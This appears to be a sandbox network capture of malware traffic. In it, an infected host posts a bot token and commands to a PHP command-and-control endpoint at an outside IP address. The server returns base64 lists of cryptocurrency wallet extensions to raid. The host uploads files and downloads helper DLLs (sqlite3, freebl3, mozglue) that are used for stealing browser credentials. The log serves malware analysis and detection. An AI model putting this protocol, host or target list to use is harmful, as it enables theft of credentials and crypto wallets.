Oct 25, 2024 05:21:04.597058058 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBFCGIIIJDBGCBGIDGI Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 2d 2d 0d 0a Data Ascii: ------GDBFCGIIIJDBGCBGIDGIContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------GDBFCGIIIJDBGCBGIDGIContent-Disposition: form-data; name="message"plugins------GDBFCGIIIJDBGCBGIDGI--
Oct 25, 2024 05:21:04.879740953 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 25, 2024 05:21:04.879841089 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Oct 25, 2024 05:21:04.879856110 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Oct 25, 2024 05:21:04.879872084 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Oct 25, 2024 05:21:04.879887104 CEST	848	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Oct 25, 2024 05:21:04.879901886 CEST	1236	IN	Data Raw: 62 6e 52 70 5a 58 49 67 56 32 46 73 62 47 56 30 66 47 74 77 63 47 5a 6b 61 57 6c 77 63 47 68 6d 59 32 4e 6c 62 57 4e 70 5a 32 35 6f 61 57 5a 77 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 Data Ascii: bnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1
Oct 25, 2024 05:21:04.879915953 CEST	316	IN	Data Raw: 62 57 6c 6f 62 6d 52 74 62 57 4e 6b 59 57 35 68 59 32 39 73 62 6d 68 38 4d 58 77 77 66 44 42 38 51 6d 6c 30 5a 32 56 30 49 46 64 68 62 47 78 6c 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d Data Ascii: bWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN
Oct 25, 2024 05:21:04.882119894 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECB Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 2d 2d 0d 0a Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="message"fplugins------KJKKKJJJKJKFHJJJJECB--
Oct 25, 2024 05:21:05.164068937 CEST	335	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:05 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 25, 2024 05:21:05.181284904 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJ Host: 185.215.113.37 Content-Length: 5727 Connection: Keep-Alive Cache-Control: no-cache
Oct 25, 2024 05:21:05.181286097 CEST	5727	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 Data Ascii: ------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 25, 2024 05:21:05.979388952 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:05 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 25, 2024 05:21:06.226475954 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 25, 2024 05:21:06.507191896 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:06 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 25, 2024 05:21:06.507251978 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 25, 2024 05:21:06.507286072 CEST	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Oct 25, 2024 05:21:07.913971901 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBA Host: 185.215.113.37 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Oct 25, 2024 05:21:08.707278013 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 25, 2024 05:21:08.794842005 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFHDBGHJKFIDHJJJEBK Host: 185.215.113.37 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Oct 25, 2024 05:21:09.580683947 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 25, 2024 05:21:09.600378990 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDB Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------DGHIDHCAAKECGCBFIJDBContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------DGHIDHCAAKECGCBFIJDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DGHIDHCAAKECGCBFIJDBContent-Disposition: form-data; name="file"------DGHIDHCAAKECGCBFIJDB--
Oct 25, 2024 05:21:10.382963896 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 25, 2024 05:21:10.764029980 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCFBGDHJKFIEBFIECGH Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="file"------BGCFBGDHJKFIEBFIECGH--
Oct 25, 2024 05:21:11.549763918 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 25, 2024 05:21:11.846036911 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 25, 2024 05:21:12.129725933 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 25, 2024 05:21:13.089344978 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 25, 2024 05:21:13.369134903 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 25, 2024 05:21:13.833237886 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
